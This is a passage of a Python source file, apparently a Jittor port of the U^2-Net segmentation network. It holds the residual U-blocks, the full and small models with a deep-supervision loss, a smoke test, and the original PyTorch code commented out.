        self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)

    def execute(self, x):
        """Run the U-shaped encoder/decoder and add the residual shortcut."""
        x_in = self.rebnconvin(x)
        e1 = self.rebnconv1(x_in)
        e2 = self.rebnconv2(self.pool1(e1))
        e3 = self.rebnconv3(self.pool2(e2))
        e4 = self.rebnconv4(self.pool3(e3))
        e5 = self.rebnconv5(e4)
        d4 = self.rebnconv4d(jt.contrib.concat((e5, e4), dim=1))
        d3 = self.rebnconv3d(jt.contrib.concat((_upsample_like(d4, e3), e3), dim=1))
        d2 = self.rebnconv2d(jt.contrib.concat((_upsample_like(d3, e2), e2), dim=1))
        d1 = self.rebnconv1d(jt.contrib.concat((_upsample_like(d2, e1), e1), dim=1))
        return d1 + x_in
### RSU-4 ###
class RSU4(nn.Module):
    """Residual U-block with 4 encoder levels (RSU-4)."""

    def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
        super().__init__()
        # Input projection; its output is also the residual shortcut.
        self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
        self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
        self.pool1 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool2 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=1)
        # Bottom layer uses dilation instead of another pooling step.
        self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=2)
        # Decoder stages take skip + upsampled deeper feature (2*mid_ch).
        self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)

    def execute(self, x):
        """Run the U-shaped encoder/decoder and add the residual shortcut."""
        x_in = self.rebnconvin(x)
        e1 = self.rebnconv1(x_in)
        e2 = self.rebnconv2(self.pool1(e1))
        e3 = self.rebnconv3(self.pool2(e2))
        e4 = self.rebnconv4(e3)
        d3 = self.rebnconv3d(jt.contrib.concat((e4, e3), dim=1))
        d2 = self.rebnconv2d(jt.contrib.concat((_upsample_like(d3, e2), e2), dim=1))
        d1 = self.rebnconv1d(jt.contrib.concat((_upsample_like(d2, e1), e1), dim=1))
        return d1 + x_in
### RSU-4F ### # No pooling
class RSU4F(nn.Module):
    """RSU-4F: dilation-only residual U-block (no pooling or upsampling)."""

    def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
        super().__init__()
        # Input projection; its output is also the residual shortcut.
        self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
        # Encoder path grows the dilation rate instead of downsampling.
        self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
        self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=2)
        self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=4)
        self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=8)
        # Decoder path mirrors the dilation schedule on concatenated skips.
        self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=4)
        self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=2)
        self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)

    def execute(self, x):
        """Encode with increasing dilation, decode with skips, add shortcut."""
        x_in = self.rebnconvin(x)
        e1 = self.rebnconv1(x_in)
        e2 = self.rebnconv2(e1)
        e3 = self.rebnconv3(e2)
        e4 = self.rebnconv4(e3)
        d3 = self.rebnconv3d(jt.contrib.concat((e4, e3), dim=1))
        d2 = self.rebnconv2d(jt.contrib.concat((d3, e2), dim=1))
        d1 = self.rebnconv1d(jt.contrib.concat((d2, e1), dim=1))
        return d1 + x_in
##### U^2-Net ####
class U2NET(nn.Module):
    """U^2-Net (full size): nested residual-U encoder/decoder for segmentation.

    Six RSU encoder stages are pooled down, then mirrored by decoder stages
    fed with skip connections. Each decoder stage (and the deepest encoder
    stage) has a 3x3 side head; the six side maps are upsampled to the
    resolution of the finest one and fused by a 1x1 conv into `d0`.
    """

    def __init__(self, in_ch=3, n_classes=2):
        super(U2NET, self).__init__()
        # encoder
        self.stage1 = RSU7(in_ch, 32, 64)
        self.pool12 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage2 = RSU6(64, 32, 128)
        self.pool23 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage3 = RSU5(128, 64, 256)
        self.pool34 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage4 = RSU4(256, 128, 512)
        self.pool45 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage5 = RSU4F(512, 256, 512)
        self.pool56 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage6 = RSU4F(512, 256, 512)
        # decoder: inputs are skip + upsampled deeper feature, hence 2x channels
        self.stage5d = RSU4F(1024, 256, 512)
        self.stage4d = RSU4(1024, 128, 256)
        self.stage3d = RSU5(512, 64, 128)
        self.stage2d = RSU6(256, 32, 64)
        self.stage1d = RSU7(128, 16, 64)
        # side heads: one per decoder stage plus the deepest encoder stage
        self.side1 = nn.Conv(64, n_classes, 3, padding=1)
        self.side2 = nn.Conv(64, n_classes, 3, padding=1)
        self.side3 = nn.Conv(128, n_classes, 3, padding=1)
        self.side4 = nn.Conv(256, n_classes, 3, padding=1)
        self.side5 = nn.Conv(512, n_classes, 3, padding=1)
        self.side6 = nn.Conv(512, n_classes, 3, padding=1)
        # fuse the six side maps into the final prediction
        self.outconv = nn.Conv((6 * n_classes), n_classes, 1)

    def execute(self, x):
        """Return the fused segmentation logits `d0` for input `x`.

        Only `d0` is returned; the side maps are computed internally for
        fusion. (`get_loss` expects the caller to have all seven maps —
        NOTE(review): that requires a variant of this forward that returns
        d0..d6; confirm against the training loop.)
        """
        #-------------------- encoder -------------------
        hx = x
        #stage 1
        hx1 = self.stage1(hx)
        hx = self.pool12(hx1)
        #stage 2
        hx2 = self.stage2(hx)
        hx = self.pool23(hx2)
        #stage 3
        hx3 = self.stage3(hx)
        hx = self.pool34(hx3)
        #stage 4
        hx4 = self.stage4(hx)
        hx = self.pool45(hx4)
        #stage 5
        hx5 = self.stage5(hx)
        hx = self.pool56(hx5)
        #stage 6
        hx6 = self.stage6(hx)
        hx6up = _upsample_like(hx6, hx5)
        #-------------------- decoder -------------------
        hx5d = self.stage5d(jt.contrib.concat((hx6up, hx5), dim=1))
        hx5dup = _upsample_like(hx5d, hx4)
        hx4d = self.stage4d(jt.contrib.concat((hx5dup, hx4), dim=1))
        hx4dup = _upsample_like(hx4d, hx3)
        hx3d = self.stage3d(jt.contrib.concat((hx4dup, hx3), dim=1))
        hx3dup = _upsample_like(hx3d, hx2)
        hx2d = self.stage2d(jt.contrib.concat((hx3dup, hx2), dim=1))
        hx2dup = _upsample_like(hx2d, hx1)
        hx1d = self.stage1d(jt.contrib.concat((hx2dup, hx1), dim=1))
        #side output
        d1 = self.side1(hx1d)
        d2 = self.side2(hx2d)
        d2 = _upsample_like(d2, d1)
        d3 = self.side3(hx3d)
        d3 = _upsample_like(d3, d1)
        d4 = self.side4(hx4d)
        d4 = _upsample_like(d4, d1)
        d5 = self.side5(hx5d)
        d5 = _upsample_like(d5, d1)
        d6 = self.side6(hx6)
        d6 = _upsample_like(d6, d1)
        d0 = self.outconv(jt.contrib.concat((d1, d2, d3, d4, d5, d6), dim=1))
        return d0

    def get_loss(self, target, d0, d1, d2, d3, d4, d5, d6, ignore_index=None):
        """Deep-supervision loss over the fused map and all six side maps.

        Returns:
            (loss0, loss): cross-entropy on the fused output `d0`, and the
            sum of cross-entropy losses over all seven outputs.
        """
        outputs = (d0, d1, d2, d3, d4, d5, d6)
        losses = [nn.cross_entropy_loss(d, target, ignore_index=ignore_index)
                  for d in outputs]
        total = losses[0]
        for part in losses[1:]:
            total = total + part
        # BUGFIX: the original used "%3f" (field *width* 3, default 6 decimal
        # places); "%.3f" (3 decimal places) is what was evidently intended.
        print("l0: %.3f, l1: %.3f, l2: %.3f, l3: %.3f, l4: %.3f, l5: %.3f, l6: %.3f\n"
              % tuple(l.data.item() for l in losses))
        return losses[0], total

    def update_params(self, loss, optimizer):
        """Perform one optimisation step for `loss` with `optimizer`."""
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
### U^2-Net small ###
class U2NETP(nn.Module):
    """U^2-Net small variant: same topology as U2NET with 64-channel stages.

    All encoder/decoder stages use 64 output channels with 16 mid channels,
    shrinking the model to roughly 1.1M parameters (vs ~44M for U2NET).
    """

    def __init__(self, in_ch=3, n_classes=2):
        super(U2NETP, self).__init__()
        # encoder
        self.stage1 = RSU7(in_ch, 16, 64)
        self.pool12 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage2 = RSU6(64, 16, 64)
        self.pool23 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage3 = RSU5(64, 16, 64)
        self.pool34 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage4 = RSU4(64, 16, 64)
        self.pool45 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage5 = RSU4F(64, 16, 64)
        self.pool56 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.stage6 = RSU4F(64, 16, 64)
        # decoder: inputs are skip + upsampled deeper feature, hence 128 in
        self.stage5d = RSU4F(128, 16, 64)
        self.stage4d = RSU4(128, 16, 64)
        self.stage3d = RSU5(128, 16, 64)
        self.stage2d = RSU6(128, 16, 64)
        self.stage1d = RSU7(128, 16, 64)
        # side heads: one per decoder stage plus the deepest encoder stage
        self.side1 = nn.Conv(64, n_classes, 3, padding=1)
        self.side2 = nn.Conv(64, n_classes, 3, padding=1)
        self.side3 = nn.Conv(64, n_classes, 3, padding=1)
        self.side4 = nn.Conv(64, n_classes, 3, padding=1)
        self.side5 = nn.Conv(64, n_classes, 3, padding=1)
        self.side6 = nn.Conv(64, n_classes, 3, padding=1)
        # fuse the six side maps into the final prediction
        self.outconv = nn.Conv((6 * n_classes), n_classes, 1)

    def execute(self, x):
        """Return the fused segmentation logits `d0` for input `x`."""
        #-------------------- encoder -------------------
        hx = x
        #stage 1
        hx1 = self.stage1(hx)
        hx = self.pool12(hx1)
        #stage 2
        hx2 = self.stage2(hx)
        hx = self.pool23(hx2)
        #stage 3
        hx3 = self.stage3(hx)
        hx = self.pool34(hx3)
        #stage 4
        hx4 = self.stage4(hx)
        hx = self.pool45(hx4)
        #stage 5
        hx5 = self.stage5(hx)
        hx = self.pool56(hx5)
        #stage 6
        hx6 = self.stage6(hx)
        hx6up = _upsample_like(hx6, hx5)
        #-------------------- decoder -------------------
        hx5d = self.stage5d(jt.contrib.concat((hx6up, hx5), dim=1))
        hx5dup = _upsample_like(hx5d, hx4)
        hx4d = self.stage4d(jt.contrib.concat((hx5dup, hx4), dim=1))
        hx4dup = _upsample_like(hx4d, hx3)
        hx3d = self.stage3d(jt.contrib.concat((hx4dup, hx3), dim=1))
        hx3dup = _upsample_like(hx3d, hx2)
        hx2d = self.stage2d(jt.contrib.concat((hx3dup, hx2), dim=1))
        hx2dup = _upsample_like(hx2d, hx1)
        hx1d = self.stage1d(jt.contrib.concat((hx2dup, hx1), dim=1))
        #side output
        d1 = self.side1(hx1d)
        d2 = self.side2(hx2d)
        d2 = _upsample_like(d2, d1)
        d3 = self.side3(hx3d)
        d3 = _upsample_like(d3, d1)
        d4 = self.side4(hx4d)
        d4 = _upsample_like(d4, d1)
        d5 = self.side5(hx5d)
        d5 = _upsample_like(d5, d1)
        d6 = self.side6(hx6)
        d6 = _upsample_like(d6, d1)
        d0 = self.outconv(jt.contrib.concat((d1, d2, d3, d4, d5, d6), dim=1))
        return d0

    def get_loss(self, target, d0, d1, d2, d3, d4, d5, d6, ignore_index=None):
        """Deep-supervision loss over the fused map and all six side maps.

        Returns:
            (loss0, loss): cross-entropy on the fused output `d0`, and the
            sum of cross-entropy losses over all seven outputs.
        """
        outputs = (d0, d1, d2, d3, d4, d5, d6)
        losses = [nn.cross_entropy_loss(d, target, ignore_index=ignore_index)
                  for d in outputs]
        total = losses[0]
        for part in losses[1:]:
            total = total + part
        # BUGFIX: the original used "%3f" (field *width* 3, default 6 decimal
        # places); "%.3f" (3 decimal places) is what was evidently intended.
        print("l0: %.3f, l1: %.3f, l2: %.3f, l3: %.3f, l4: %.3f, l5: %.3f, l6: %.3f\n"
              % tuple(l.data.item() for l in losses))
        return losses[0], total

    def update_params(self, loss, optimizer):
        """Perform one optimisation step for `loss` with `optimizer`."""
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
def main():
    """Smoke-test U2NETP: one forward pass plus parameter-count report."""
    model = U2NETP()
    dummy = jt.ones([2, 3, 512, 512])
    out = model(dummy)
    print(out[0].shape)
    n_total = sum(p.numel() for p in model.parameters())
    print(f'{n_total:,} total parameters.')
    n_trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
    print(f'{n_trainable:,} training parameters.')
    # Local import: jittorsummary is only needed for this diagnostic run.
    from jittorsummary import summary
    summary(model, input_size=(3, 512, 512))
# Reference parameter counts (reported by jittorsummary):
#   U2NET:  44,052,518 total / 44,023,718 trainable
#   U2NETP:  1,140,358 total /  1,134,662 trainable
if __name__ == '__main__':
    main()
# from jittor.utils.pytorch_converter import convert
# pytorch_code="""
# import torch
# import torch.nn as nn
# import torch.nn.functional as F
# class REBNCONV(nn.Module):
# def __init__(self,in_ch=3,out_ch=3,dirate=1):
# super(REBNCONV,self).__init__()
# self.conv_s1 = nn.Conv2d(in_ch,out_ch,3,padding=1*dirate,dilation=1*dirate)
# self.bn_s1 = nn.BatchNorm2d(out_ch)
# self.relu_s1 = nn.ReLU(inplace=True)
# def forward(self,x):
# hx = x
# xout = self.relu_s1(self.bn_s1(self.conv_s1(hx)))
# return xout
# ## upsample tensor 'src' to have the same spatial size with tensor 'tar'
# def _upsample_like(src,tar):
# src = nn.Upsample(src,size=tar.shape[2:],mode='bilinear')
# return src
# ### RSU-7 ###
# class RSU7(nn.Module):#UNet07DRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU7,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.pool1 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool2 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool3 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool4 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv5 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool5 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv6 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.rebnconv7 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv6d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv5d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv4d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx = self.pool1(hx1)
# hx2 = self.rebnconv2(hx)
# hx = self.pool2(hx2)
# hx3 = self.rebnconv3(hx)
# hx = self.pool3(hx3)
# hx4 = self.rebnconv4(hx)
# hx = self.pool4(hx4)
# hx5 = self.rebnconv5(hx)
# hx = self.pool5(hx5)
# hx6 = self.rebnconv6(hx)
# hx7 = self.rebnconv7(hx6)
# hx6d = self.rebnconv6d(torch.cat((hx7,hx6),1))
# hx6dup = _upsample_like(hx6d,hx5)
# hx5d = self.rebnconv5d(torch.cat((hx6dup,hx5),1))
# hx5dup = _upsample_like(hx5d,hx4)
# hx4d = self.rebnconv4d(torch.cat((hx5dup,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.rebnconv2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.rebnconv1d(torch.cat((hx2dup,hx1),1))
# return hx1d + hxin
# ### RSU-6 ###
# class RSU6(nn.Module):#UNet06DRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU6,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.pool1 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool2 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool3 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool4 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv5 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.rebnconv6 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv5d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv4d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx = self.pool1(hx1)
# hx2 = self.rebnconv2(hx)
# hx = self.pool2(hx2)
# hx3 = self.rebnconv3(hx)
# hx = self.pool3(hx3)
# hx4 = self.rebnconv4(hx)
# hx = self.pool4(hx4)
# hx5 = self.rebnconv5(hx)
# hx6 = self.rebnconv6(hx5)
# hx5d = self.rebnconv5d(torch.cat((hx6,hx5),1))
# hx5dup = _upsample_like(hx5d,hx4)
# hx4d = self.rebnconv4d(torch.cat((hx5dup,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.rebnconv2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.rebnconv1d(torch.cat((hx2dup,hx1),1))
# return hx1d + hxin
# ### RSU-5 ###
# class RSU5(nn.Module):#UNet05DRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU5,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.pool1 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool2 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool3 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.rebnconv5 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv4d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx = self.pool1(hx1)
# hx2 = self.rebnconv2(hx)
# hx = self.pool2(hx2)
# hx3 = self.rebnconv3(hx)
# hx = self.pool3(hx3)
# hx4 = self.rebnconv4(hx)
# hx5 = self.rebnconv5(hx4)
# hx4d = self.rebnconv4d(torch.cat((hx5,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.rebnconv2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.rebnconv1d(torch.cat((hx2dup,hx1),1))
# return hx1d + hxin
# ### RSU-4 ###
# class RSU4(nn.Module):#UNet04DRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU4,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.pool1 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool2 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx = self.pool1(hx1)
# hx2 = self.rebnconv2(hx)
# hx = self.pool2(hx2)
# hx3 = self.rebnconv3(hx)
# hx4 = self.rebnconv4(hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.rebnconv2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.rebnconv1d(torch.cat((hx2dup,hx1),1))
# return hx1d + hxin
# ### RSU-4F ###
# class RSU4F(nn.Module):#UNet04FRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU4F,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=4)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=8)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=4)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=2)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx2 = self.rebnconv2(hx1)
# hx3 = self.rebnconv3(hx2)
# hx4 = self.rebnconv4(hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4,hx3),1))
# hx2d = self.rebnconv2d(torch.cat((hx3d,hx2),1))
# hx1d = self.rebnconv1d(torch.cat((hx2d,hx1),1))
# return hx1d + hxin
# ##### U^2-Net ####
# class U2NET(nn.Module):
# def __init__(self,in_ch=3,out_ch=1):
# super(U2NET,self).__init__()
# self.stage1 = RSU7(in_ch,32,64)
# self.pool12 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage2 = RSU6(64,32,128)
# self.pool23 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage3 = RSU5(128,64,256)
# self.pool34 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage4 = RSU4(256,128,512)
# self.pool45 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage5 = RSU4F(512,256,512)
# self.pool56 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage6 = RSU4F(512,256,512)
# # decoder
# self.stage5d = RSU4F(1024,256,512)
# self.stage4d = RSU4(1024,128,256)
# self.stage3d = RSU5(512,64,128)
# self.stage2d = RSU6(256,32,64)
# self.stage1d = RSU7(128,16,64)
# self.side1 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side2 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side3 = nn.Conv2d(128,out_ch,3,padding=1)
# self.side4 = nn.Conv2d(256,out_ch,3,padding=1)
# self.side5 = nn.Conv2d(512,out_ch,3,padding=1)
# self.side6 = nn.Conv2d(512,out_ch,3,padding=1)
# self.outconv = nn.Conv2d(6*out_ch,out_ch,1)
# def forward(self,x):
# hx = x
# #stage 1
# hx1 = self.stage1(hx)
# hx = self.pool12(hx1)
# #stage 2
# hx2 = self.stage2(hx)
# hx = self.pool23(hx2)
# #stage 3
# hx3 = self.stage3(hx)
# hx = self.pool34(hx3)
# #stage 4
# hx4 = self.stage4(hx)
# hx = self.pool45(hx4)
# #stage 5
# hx5 = self.stage5(hx)
# hx = self.pool56(hx5)
# #stage 6
# hx6 = self.stage6(hx)
# hx6up = _upsample_like(hx6,hx5)
# #-------------------- decoder --------------------
# hx5d = self.stage5d(torch.cat((hx6up,hx5),1))
# hx5dup = _upsample_like(hx5d,hx4)
# hx4d = self.stage4d(torch.cat((hx5dup,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.stage3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.stage2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.stage1d(torch.cat((hx2dup,hx1),1))
# #side output
# d1 = self.side1(hx1d)
# d2 = self.side2(hx2d)
# d2 = _upsample_like(d2,d1)
# d3 = self.side3(hx3d)
# d3 = _upsample_like(d3,d1)
# d4 = self.side4(hx4d)
# d4 = _upsample_like(d4,d1)
# d5 = self.side5(hx5d)
# d5 = _upsample_like(d5,d1)
# d6 = self.side6(hx6)
# d6 = _upsample_like(d6,d1)
# d0 = self.outconv(torch.cat((d1,d2,d3,d4,d5,d6),1))
# return F.sigmoid(d0), F.sigmoid(d1), F.sigmoid(d2), F.sigmoid(d3), F.sigmoid(d4), F.sigmoid(d5), F.sigmoid(d6)
# ### U^2-Net small ###
# class U2NETP(nn.Module):
# def __init__(self,in_ch=3,out_ch=1):
# super(U2NETP,self).__init__()
# self.stage1 = RSU7(in_ch,16,64)
# self.pool12 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage2 = RSU6(64,16,64)
# self.pool23 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage3 = RSU5(64,16,64)
# self.pool34 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage4 = RSU4(64,16,64)
# self.pool45 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage5 = RSU4F(64,16,64)
# self.pool56 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage6 = RSU4F(64,16,64)
# # decoder
# self.stage5d = RSU4F(128,16,64)
# self.stage4d = RSU4(128,16,64)
# self.stage3d = RSU5(128,16,64)
# self.stage2d = RSU6(128,16,64)
# self.stage1d = RSU7(128,16,64)
# self.side1 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side2 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side3 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side4 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side5 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side6 = nn.Conv2d(64,out_ch,3,padding=1)
# self.outconv = nn.Conv2d(6*out_ch,out_ch,1)
# def forward(self,x):
# hx = x
# #stage 1
# hx1 = self.stage1(hx)
# hx = self.pool12(hx1)
# #stage 2
# hx2 = self.stage2(hx)
# hx = self.pool23(hx2)
# #stage 3
# hx3 = self.stage3(hx)
# hx = self.pool34(hx3)
# #stage 4
# hx4 = self.stage4(hx)
# hx = self.pool45(hx4)
# #stage 5
# hx5 = self.stage5(hx)
# hx = self.pool56(hx5)
# #stage 6
# hx6 = self.stage6(hx)
# hx6up = _upsample_like(hx6,hx5)
# #decoder
# hx5d = self.stage5d(torch.cat((hx6up,hx5),1))
# hx5dup = _upsample_like(hx5d,hx4)
# hx4d = self.stage4d(torch.cat((hx5dup,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.stage3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.stage2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.stage1d(torch.cat((hx2dup,hx1),1))
# #side output
# d1 = self.side1(hx1d)
# d2 = self.side2(hx2d)
# d2 = _upsample_like(d2,d1)
# d3 = self.side3(hx3d)
# d3 = _upsample_like(d3,d1)
# d4 = self.side4(hx4d)
# d4 = _upsample_like(d4,d1)
# d5 = self.side5(hx5d)
# d5 = _upsample_like(d5,d1)
# d6 = self.side6(hx6)
# d6 = _upsample_like(d6,d1)
# d0 = self.outconv(torch.cat((d1,d2,d3,d4,d5,d6),1))
